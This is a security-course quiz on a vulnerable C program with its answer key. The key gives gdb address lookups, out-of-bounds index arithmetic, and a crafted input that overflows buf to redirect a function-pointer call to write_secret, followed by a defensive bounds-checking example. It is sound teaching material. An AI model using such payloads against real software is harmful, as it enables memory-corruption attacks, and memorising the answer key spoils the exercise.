Subject: Computer Science
Complete this
Question 1
There is a stack-based overflow in the program. What is the name of the stack-allocated variable that contains the overflowed buffer?
Question 2
Consider the buffer you just identified: Running what line of code will overflow the buffer? (We want the line number, not the code itself.)
Question 3
There is another vulnerability, not dependent at all on the first, involving a non-stack-allocated buffer that can be indexed outside its bounds (which, broadly construed, is a kind of buffer overflow). What variable contains this buffer?
Question 4
Consider the buffer you just identified: Running what line of code overflows the buffer? (We want the number here, not the code itself.)
Question 5
What is the address of buf (the local variable in the main function)? Enter the answer in either hexadecimal format (a 0x followed by 8 "digits" 0-9 or a-f, like 0xbfff0014) or decimal format. Note here that we want the address of buf, not its contents.
Question 6
What is the address of ptrs (the global variable)? As with the previous question, use hex or decimal format.
Question 7
What is the address of write_secret (the function)? Use hex or decimal.
Question 8
What is the address of p (the local variable in the main function)? Use hex or decimal format.
Question 9
What input do you provide to the program so that ptrs[s] reads (and then tries to execute) the contents of stack variable p instead of a function pointer stored in the buffer pointed to by ptrs? As a hint, you can determine the answer by performing a little arithmetic on the addresses you have already gathered. If successful, you will end up executing the pat_on_back function. Provide the smallest positive integer.
Question 10
What do you enter so that ptrs[s] reads (and then tries to execute) starting from the 65th byte in buf, i.e., the location at buf[64]? Enter your answer as an (unsigned) integer.
Question 11
What do you replace \xEE\xEE\xEE\xEE with in the following input to the program (which due to the overflow will be filling in the 65th-68th bytes of buf) so that the ptrs[s] operation executes the write_secret function, thus dumping the secret? (Hint: Be sure to take endianness into account.)
771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xEE\xEE\xEE\xEE
Answer:
1. wis
2. 62
3. ptrs
4. 101
5. 0xbfff f130
6. 0x0804 a0d4
7. 0x0804 8534
8. 0xbfff f534
9.
(p-ptrs)/4 is
print /x (0xbffff534 - 0x804a0d4)/4
0x2dfed518 or 771675416
10.
(gdb) print /x &buf[64]
$6 = 0xbffff170
(gdb) print /d (int*)&buf[64]-(int *)&ptrs
$14 = 771675175
771675175
11.
(gdb) print &write_secret
$7 = (void (*)(void)) 0x8048534 <write_secret>
771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x34\x85\x04\x08
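
Questions 9-11 work only because the program uses the parsed integer s as an index into ptrs without checking it against the size of the table. The sketch below is an added example, not the lab's source code: it shows a dispatcher that rejects the indices computed above. The handler functions, the two-entry table, and the names parse_index and safe_dispatch are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

typedef void (*handler_fn)(void);

static int last_called = -1;            /* records which handler ran */
static void handler_a(void) { last_called = 0; }
static void handler_b(void) { last_called = 1; }

/* Hypothetical stand-in for the lab's global table of function pointers. */
static handler_fn ptrs[] = { handler_a, handler_b };
#define NPTRS (sizeof ptrs / sizeof ptrs[0])

/* Parse a decimal index strictly: no sign, no trailing bytes, no overflow.
 * Assumes s[len] is a NUL terminator, as it is for a C string. */
static int parse_index(const char *s, size_t len, size_t *out)
{
    char *end;
    unsigned long v;

    if (len == 0 || s[0] < '0' || s[0] > '9')
        return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno == ERANGE || (size_t)(end - s) != len)
        return -1;      /* e.g. "0\0AAAA": bytes follow the number */
    *out = (size_t)v;
    return 0;
}

/* Call ptrs[idx] only when idx lies inside the table. */
int safe_dispatch(const char *input, size_t len)
{
    size_t idx;

    if (parse_index(input, len, &idx) != 0 || idx >= NPTRS)
        return -1;
    ptrs[idx]();
    return 0;
}

int main(void)
{
    static const char big[] = "771675416";   /* index from answer 9 */
    printf("in range: %d\n", safe_dispatch("1", 1));
    printf("answer 9 index: %d\n", safe_dispatch(big, sizeof big - 1));
    return 0;
}
```

Passing the number of bytes actually read, rather than relying on the first NUL, is what lets the check refuse input that carries extra data after the terminator.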